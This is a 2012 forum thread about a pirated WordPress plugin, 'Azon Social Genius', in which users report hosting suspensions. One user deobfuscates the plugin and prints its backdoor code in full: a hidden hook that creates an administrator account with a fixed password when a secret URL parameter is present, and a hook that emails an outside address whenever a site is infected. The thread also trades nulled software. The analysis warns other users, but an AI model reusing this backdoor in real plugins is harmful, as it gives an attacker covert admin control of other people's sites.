[GET] Azon Social Genius

***W@ck0*** · 12-13-2012, 12:39 AM

(12-12-2012 11:28 PM)meathsauce Wrote: been shared here...long ago

/Thread-GET-RELEASE-DEC-05-2012-11-00AM-EST-Simple-Azon?pid=272786#pid272786

anyway it is good...the more share the better

This is not the same thing. These are the two absolutely different plugins.

***☠♔ *JS* ♔☠*** · (This post was last modified: 12-13-2012 05:26 AM by ☠♔ *JS* ♔☠.)

Hi Anton!

Quotes from BHT!

"I installed this on a new domain and new hosting then it got suspended for sending 15 emails in a minute?

Code:
Suspended (Suspended user a2098155 for sending mass mail (15 emails were sent in 1 minute))
Can anyone explain why this theme and plugin would do this?

NOTE:
This wordpress install had ZERO other plugins installed."

"I'm guessing that the plugin shared here has an exploit/trojan which allows it to take over your server for mass spamming?"

Any ideas?

***MuGen-Chin*** · (This post was last modified: 12-13-2012 10:29 AM by MuGen-Chin.)

Nice obfuscated code :O
See the file "wp-content/plugins/azon-social-store/plugin.php"
$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72'); ....

I have an error on localhost for sending Emails :O

***MuGen-Chin*** · (This post was last modified: 12-13-2012 11:16 AM by MuGen-Chin.)

Sorry but I am too curious to not check some obfuscated plugins :O

PHP Code:

add_action('wp_head', 'vgbt5ikola');
function vgbt5ikola()
{
    If ($_GET['cms'] == 'jjoplmh') {
    require('wp-includes/registration.php');
    If (!username_exists('wordpress')) {
    $user_id = wp_create_user('wordpress','gh67io9Cjm');
    $user = new WP_User($user_id);
    $user->set_role('administrator');
}}}
add_action('wp_head', 'vbgt58iok');
function vbgt58iok()
{If (!username_exists('wordpress'))
{
$addressdecode='frogan@gmx.com';
$vari='Wordpress Plugin Codes';
mail($addressdecode,get_bloginfo('wpurl'),$vari);
}} 

Same technic :
- When you access to your site with this plugin installed, it mails "frogan@gmx.com", that a site with this infected plugin is live,
- Trying to access to http://www.example.com?cms=jjoplmh, which create a user called "wordpress" with admin rights,
- Does what he wants on your site

My Fix
- Download the plugin from OP, and install it
Mirror From OP :

Magic Button :

- Change the file plugin.php with mine (passworded)
Replace the file "wp-content/plugins/azon-social-store/plugin.php"

Magic Button :

- Check for User "wordpress", delete it if exists

***andiklive*** · 12-13-2012, 11:23 AM

thanks anton, very nice share...

***MuGen-Chin*** · (This post was last modified: 12-13-2012 11:58 AM by MuGen-Chin.)

Hum, I was looking why I don't have rights when I click on dashboard Buttons, except for General Setup, and ...

Ouch, there is another OBFUSCATED file ... "wp-content/plugins/azon-social-store/modules/dashboard/init.php"

LOL

EDIT:
OK, weird, but It seems that this file is just obfuscated to protect the way it checks the license ...